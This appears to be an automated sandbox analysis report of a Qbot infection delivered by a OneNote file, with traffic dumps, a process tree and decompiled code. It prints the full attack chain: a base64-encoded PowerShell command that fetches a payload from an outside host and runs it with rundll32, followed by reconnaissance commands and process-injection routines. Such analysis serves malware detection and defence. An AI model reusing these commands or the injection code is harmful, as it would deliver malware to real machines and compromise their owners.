30 b5 2a 5b ba a5 ef 78 42 bb 43 de e4 61 e5 96 1d 97 7f 81 1f 95 11 2c 17 92 5b 09 2d 9f 95 c8 ef db d3 06 9d 6c f7 9f 4f 6c 45 80 9f 6d 39 71 6c 59 cc f1 38 2a 8e Data Ascii: 538/nbJo)L:c?HJlOo)CM5#RL%N1HfyPH2Z#POE$"5?rOj6cR}B.4Zl~LZTSnFy87\o{?l&(D0[xBCa,[-lOlEm9qlY8
2023-02-07 17:26:33 UTC	352	IN	Data Raw: d8 f2 67 b7 b5 34 cf 47 e9 c6 b4 04 30 a7 7f 2b 6d 64 27 4f 55 56 8e bc 71 22 0f 17 95 af 6f 99 17 0d f2 43 d4 9d 93 c8 ad 6c a4 00 a6 25 c4 5b d5 c6 be cb ed 26 7b 20 75 f4 e6 92 12 0a f8 ea 5e cb cc 50 aa 15 a5 d3 d5 e8 55 0e 97 4b c0 fe e1 ee c2 f4 37 35 2a f8 41 e1 d2 ef 57 d6 19 18 25 dd c6 8b 29 14 01 40 e4 be b6 7e 94 13 43 f4 f7 15 df 15 a4 17 87 89 af 02 f5 57 a2 dd c7 82 6c 89 e6 6d 79 e8 98 d3 a1 b4 da ec b4 d9 bf 5b 2e ff 3a 4d 18 ec 9a b9 ff 2b 17 d2 f8 f0 d9 b1 eb ca 42 ec 95 77 09 c1 f0 f2 2b 1e ad 98 b4 d6 88 81 46 f8 7c 73 df 93 21 0a 6b 28 89 5a 14 45 ec db 5a 60 25 24 b0 d2 d6 44 41 33 7b f8 f9 2b 87 07 43 fb a3 48 9a b6 64 2a 95 a1 28 f5 66 51 d6 51 cb 53 4d 96 6f 3a 08 09 43 dc 60 e5 5a bd e7 63 e8 47 71 c3 38 75 ba a7 98 58 a5 e9 e5 Data Ascii: g4G0+md'OUVq"oCl%[&{ u^PUK75AW%)@~CWlmy[.:M+Bw+F\|s!k(ZEZ`%$DA3{+CHd(fQQSMo:C`ZcGq8uX
2023-02-07 17:26:33 UTC	368	IN	Data Raw: d2 d8 ef db db ba 37 7a 80 7b f6 ac f2 68 da 11 86 a3 9b 53 ea c7 01 b8 32 5f 59 95 2b 91 34 5b 96 88 6d ed 85 41 e0 cc 2c d4 73 28 af 1f 09 4f 38 2b 26 2e 20 92 f2 c6 5b d2 46 ba d2 4d 5b e4 2a 1f 98 c7 4c c0 77 12 16 dc c0 3c 65 64 f1 90 dd b7 31 39 76 79 ee 4d ea 43 25 4c 02 15 4c b4 0f 1a 87 ac 05 05 89 d6 4b f3 07 67 da de 54 1a 3b 00 f9 a6 9f 95 aa d6 60 0f 00 c0 e8 1f c9 82 21 07 fe b8 fc 10 e7 1f 9b 30 30 ea 0a a2 0c 19 db be ce 89 ac 76 ac b4 fa 36 06 1f 29 07 a6 e3 20 50 36 8a 21 32 30 ea a8 39 e8 2d d7 01 76 11 8b 1a a5 70 ad 99 4c 0c b9 26 e4 9f f1 b5 a9 76 b1 34 f1 6e d2 17 03 40 2f 54 d8 8e b8 79 f3 bf 46 d2 8b 9e a2 43 41 26 1a 06 01 13 0a fc 90 52 be 21 39 b3 6d 86 70 0a 2c 24 2e 32 a7 53 1d 67 53 4d c2 88 39 be a3 63 52 e4 dd 91 9c 0b b2 Data Ascii: 7z{hS2_Y+4[mA,s(O8+&. [FM[*Lw<ed19vyMC%LLKgT;`!00v6) P6!209-vpL&v4n@/TyFCA&R!9mp,$.2SgSM9cR
2023-02-07 17:26:33 UTC	384	IN	Data Raw: c5 f2 a8 21 99 da fb 4f 6e a6 b7 f9 33 82 c4 3e 2d 77 e9 d7 8e ae 0b 66 34 3e 3e 7b 48 71 de 1d 76 a4 e2 e3 01 2c 3a 2d cd 0c a5 ef b6 00 a9 85 f7 48 42 2a 51 a9 73 eb 80 7d 52 3d 8e 84 84 41 43 3f 24 15 70 77 2d 72 80 86 0c e9 7b 11 22 a4 6f fe 1f 05 85 21 93 e7 0e 9b dd 1f e1 8a d7 92 21 2b ab 62 15 b9 36 59 c5 60 8e 2b 46 e4 02 11 d6 d0 59 87 79 68 21 61 b0 b8 a2 2e 48 3d 17 23 cb 07 07 42 f1 7b 40 47 42 8b 80 9d 03 55 fb 2c 43 96 2c 65 14 47 48 66 20 5a 8b 9d 02 2f 91 49 9f b7 09 2f 01 0b 0b 4e 79 0f 4d 58 ff 92 a0 bf 97 33 90 39 88 15 82 bd 72 6f 69 83 45 41 0b 0f 4a 39 d2 90 bb 59 02 34 f2 39 39 7c cf 45 fb 3c ad ef 75 1c 34 8d 62 79 be fe e3 6e 4b 6f e1 09 d5 0a 4c fc d3 fd 0e 94 1c 3b 5c f8 c5 cf cf 8a b9 e0 0e 77 d3 05 23 24 2f 48 95 d8 4c 6c e9 Data Ascii: !On3>-wf4>>{Hqv,:-HB*Qs}R=AC?$pw-r{"o!!+b6Y`+FYyh!a.H=#B{@GBU,C,eGHf Z/I/NyMX39roiEAJ9Y499\|E<u4bynKoL;\w#$/HLl
2023-02-07 17:26:33 UTC	400	IN	Data Raw: c5 8f 8b 76 3d 60 91 40 04 37 95 2c a9 a1 a1 e4 55 df 2a 9e 2f c3 79 37 ed 6d bf a3 ab fa e6 04 84 29 c2 30 43 41 3f f3 2d 08 fd 13 99 c9 94 5d e2 8c 39 7c cf c5 45 67 75 a8 9c d7 33 80 67 6a 77 5e 58 68 db 35 f5 50 dc 1a 1f ea aa 1f a7 93 39 08 3c 1c 12 30 30 75 c6 4c b4 03 0c f4 08 f5 18 6c 77 07 0f ef 1b fd 76 a8 5d 3c c1 56 e6 44 da 7b f2 31 e7 c3 20 d3 8e 84 84 c1 f2 d5 4e a2 83 b2 f2 2a a1 0f 27 d5 84 27 a2 02 b2 91 3a 61 fd e8 38 02 57 b6 b1 57 6a 34 12 cf 7c 76 76 b3 e7 44 3a e7 dc b8 82 88 63 69 e8 a5 96 ad b4 3d 84 41 25 98 28 4d 4d 1f 58 00 b4 f3 ed 60 fe bb 08 02 82 93 13 11 f3 d8 37 58 4e ec e0 3a 1d ab a9 50 fc fb 41 a1 55 92 10 27 2b ef 61 e4 7a 3d 91 7d 7d 38 0a 80 f2 53 15 9e 06 60 19 0b 25 03 8a 82 fe 55 ea 7b 6c a9 12 7e d6 16 29 d8 cc Data Ascii: v=`@7,U/y7m)0CA?-]9\|Egu3gjw^Xh5P9<00uLlwv]<VD{1 N'':a8WWj4\|vvD:ci=A%(MMX`7XN:PAU'+az=}}8S`%U{l~)
2023-02-07 17:26:33 UTC	416	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49850	72.163.4.185	443	C:\Windows\SysWOW64\backgroundTaskHost.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-07 17:30:11 UTC	428	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: cisco.com Cache-Control: no-cache
2023-02-07 17:30:11 UTC	429	IN	HTTP/1.1 301 Moved permanently Location: https://www.cisco.com/ Connection: close Cache-Control: no-cache Pragma: no-cache

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ONENOTE.EXEPID: 2776, Parent PID: 4884

General

Target ID:	2
Start time:	18:26:23
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\notes.one
Imagebase:	0x7ff763c80000
File size:	2383176 bytes
MD5 hash:	59056F600C4366EE07277C20A90DAF67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 7096, Parent PID: 2776

General

Target ID:	6
Start time:	18:26:25
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
Wow64 process (32bit):	false
Commandline:	/tsr
Imagebase:	0x7ff6da8f0000
File size:	180528 bytes
MD5 hash:	377069572D48FFBF1EA2DA466A61B398
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1792, Parent PID: 4884

General

Target ID:	7
Start time:	18:26:27
Start date:	07/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Imagebase:	0x7ff6d6090000
File size:	289792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4540, Parent PID: 1792

General

Target ID:	8
Start time:	18:26:27
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5548, Parent PID: 1792

General

Target ID:	9
Start time:	18:26:27
Start date:	07/02/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Imagebase:	0x7ff76dd30000
File size:	452608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5784, Parent PID: 1792

General

Target ID:	10
Start time:	18:26:30
Start date:	07/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Imagebase:	0x7ff6d6090000
File size:	289792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7628, Parent PID: 5784

General

Target ID:	11
Start time:	18:26:30
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4460, Parent PID: 5784

General

Target ID:	12
Start time:	18:26:30
Start date:	07/02/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Invoke-WebRequest -URI https://starcomputadoras.com/lt2eLM6/01.gif -OutFile C:\programdata\putty.jpg
Imagebase:	0x7ff76dd30000
File size:	452608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5548, Parent PID: 5784

General

Target ID:	13
Start time:	18:26:32
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\programdata\putty.jpg,Wind
Imagebase:	0x7ff72e600000
File size:	71680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6804, Parent PID: 5548

General

Target ID:	14
Start time:	18:26:32
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 C:\programdata\putty.jpg,Wind
Imagebase:	0xdf0000
File size:	61440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.33862410772.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: backgroundTaskHost.exePID: 7584, Parent PID: 6804

General

Target ID:	15
Start time:	18:26:35
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\backgroundTaskHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\backgroundTaskHost.exe
Imagebase:	0xe70000
File size:	17728 bytes
MD5 hash:	F290D12F0351B56708B3DF1EC26CB45B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ONENOTEM.EXEPID: 6748, Parent PID: 4884

General

Target ID:	16
Start time:	18:26:37
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
Imagebase:	0x7ff6da8f0000
File size:	180528 bytes
MD5 hash:	377069572D48FFBF1EA2DA466A61B398
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net.exePID: 3420, Parent PID: 7584

General

Target ID:	19
Start time:	18:30:12
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net view
Imagebase:	0x8f0000
File size:	47104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5596, Parent PID: 3420

General

Target ID:	20
Start time:	18:30:12
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5948, Parent PID: 7584

General

Target ID:	22
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c set
Imagebase:	0xcd0000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8168, Parent PID: 5948

General

Target ID:	23
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ARP.EXEPID: 7408, Parent PID: 7584

General

Target ID:	24
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\ARP.EXE
Wow64 process (32bit):	true
Commandline:	arp -a
Imagebase:	0x60000
File size:	22528 bytes
MD5 hash:	4D3943EDBC9C7E18DC3469A21B30B3CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5584, Parent PID: 7408

General

Target ID:	25
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ipconfig.exePID: 3116, Parent PID: 7584

General

Target ID:	26
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /all
Imagebase:	0xff0000
File size:	29184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4832, Parent PID: 3116

General

Target ID:	27
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net.exePID: 5840, Parent PID: 7584

General

Target ID:	28
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net share
Imagebase:	0x8f0000
File size:	47104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7628, Parent PID: 5840

General

Target ID:	29
Start time:	18:30:25
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net1.exePID: 4164, Parent PID: 5840

General

Target ID:	30
Start time:	18:30:26
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 share
Imagebase:	0x90000
File size:	139776 bytes
MD5 hash:	207DEB8572F128E9AE8062D9CF3A6E8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ROUTE.EXEPID: 4992, Parent PID: 7584

General

Target ID:	31
Start time:	18:30:26
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\ROUTE.EXE
Wow64 process (32bit):	true
Commandline:	route print
Imagebase:	0x120000
File size:	19456 bytes
MD5 hash:	C563191ED28A926BCFDB1071374575F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2996, Parent PID: 4992

General

Target ID:	32
Start time:	18:30:26
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: NETSTAT.EXEPID: 3760, Parent PID: 7584

General

Target ID:	33
Start time:	18:30:26
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	netstat -nao
Imagebase:	0xf30000
File size:	32768 bytes
MD5 hash:	9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1392, Parent PID: 3760

General

Target ID:	34
Start time:	18:30:26
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net.exePID: 4372, Parent PID: 7584

General

Target ID:	35
Start time:	18:30:26
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup
Imagebase:	0x8f0000
File size:	47104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7296, Parent PID: 4372

General

Target ID:	36
Start time:	18:30:26
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net1.exePID: 3528, Parent PID: 4372

General

Target ID:	37
Start time:	18:30:27
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup
Imagebase:	0x90000
File size:	139776 bytes
MD5 hash:	207DEB8572F128E9AE8062D9CF3A6E8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: whoami.exePID: 6352, Parent PID: 7584

General

Target ID:	38
Start time:	18:30:27
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\whoami.exe
Wow64 process (32bit):	true
Commandline:	whoami /all
Imagebase:	0xaa0000
File size:	58880 bytes
MD5 hash:	801D9A1C1108360B84E60A457D5A773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7280, Parent PID: 6352

General

Target ID:	39
Start time:	18:30:27
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff626440000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 2632, Parent PID: 936

General

Target ID:	40
Start time:	18:30:27
Start date:	07/02/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff63f540000
File size:	69632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 6804, Parent PID: 5548COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	90.8%
Signature Coverage:	27.6%
Total number of Nodes:	402
Total number of Limit Nodes:	5

Executed Functions

Function 1000A4A8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 219
nativeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000A4A8(void* __ecx, intOrPtr __edx) {
				char _v6;
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				long _v32;
				intOrPtr _v36;
				void* _v37;
				intOrPtr _v40;
				char _v44;
				short _v52;
				long _v56;
				void* _v60;
				struct _WNDCLASSEXA _v108;
				void* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				char _t98;
				intOrPtr _t100;
				intOrPtr _t105;
				long _t107;
				char _t112;
				void* _t119;
				char _t120;
				void* _t124;
				struct HWND__* _t133;
				void* _t139;
				void* _t148;
				intOrPtr* _t154;
				intOrPtr _t157;
				void* _t158;
				void* _t162;
				void* _t164;

				_t83 =  *0x10020d88; // 0x4a1fc98
				_t139 = 0;
				_v16 = __ecx;
				_t157 = __edx;
				_v24 = 0;
				_v60 = 0;
				_v56 = 0;
				_v20 = 0;
				_v12 = 0;
				_v28 = 0;
				_v36 = __edx;
				if(( *(_t83 + 0x1898) & 0x00000040) != 0) {
					E1000E9DF(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x108
				_t154 =  *_t12 + _t157;
				_v32 = _t139;
				if( *_t154 != 0x4550) {
					L14:
					_t158 = _v16;
					L15:
					if(_v12 != _t139) {
						_t90 =  *0x10020e70; // 0x4a21868
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v12);
						_v12 = _t139;
					}
					L17:
					if(_v20 != 0) {
						_t87 =  *0x10020d58; // 0x4a1f900
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x130))(), _v20);
					}
					if(_v24 != 0) {
						NtClose(_v24);
					}
					return _v12;
				}
				_v60 =  *((intOrPtr*)(_t154 + 0x50));
				if(NtCreateSection( &_v24, 0xe, _t139,  &_v60, 0x40, 0x8000000, _t139) < 0) {
					goto L14;
				}
				_t97 =  *((intOrPtr*)("15")); // 0x3531
				_v8 = _t97;
				_t98 =  *0x1001dee2; // 0x0
				_v6 = _t98;
				_v108.lpszClassName =  &_v44;
				_t100 = __imp__DefWindowProcW; // 0x77597d30
				_v108.lpfnWndProc = _t100;
				_v44 = 0x74636573;
				_v40 = 0x6e6f69;
				_v108.cbWndExtra = _t139;
				_v108.style = 0xb;
				_v108.lpszMenuName = _t139;
				_v108.cbSize = 0x30;
				_v108.cbClsExtra = _t139;
				_v108.hInstance = _t139;
				if(RegisterClassExA( &_v108) != 0) {
					_t34 =  &_v44; // 0x74636573
					_t133 = CreateWindowExA(_t139, _t34,  &_v8, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t139, _t139, _t139, _t139); // executed
					if(_t133 != 0) {
						DestroyWindow(_t133); // executed
						_t35 =  &_v44; // 0x74636573
						UnregisterClassA(_t35, _t139);
					}
				}
				_t105 =  *0x10020d58; // 0x4a1f900
				_t107 = NtMapViewOfSection(_v24,  *((intOrPtr*)(_t105 + 0x130))(),  &_v20, _t139, _t139, _t139,  &_v28, 2, _t139, 0x40);
				_t158 = _v16;
				if(_t107 < 0 || NtMapViewOfSection(_v24, _t158,  &_v12, _t139, _t139, _t139,  &_v28, 2, _t139, 0x40) < 0) {
					goto L15;
				} else {
					_t112 = E1000958A( *0x10020d88, 0x1ac4);
					_v8 = _t112;
					if(_t112 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t112 + 0x224)) = _v12;
					_t162 = VirtualAllocEx(_t158, _t139, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v16, _t162, _v8, 0x1ac4,  &_v32);
					E1000953B( &_v8, 0x1ac4);
					_t119 =  *0x10020d60; // 0x10000000
					_v16 = _t119;
					_t120 =  *0x10020d88; // 0x4a1fc98
					 *0x10020d88 = _t162;
					_v8 = _t120;
					 *0x10020d60 = _v12;
					E10009602(_v20, _v36,  *((intOrPtr*)(_t154 + 0x50)));
					E1000A427(_v20, _v12, _v36);
					_t124 = E1000D389("Jjischug");
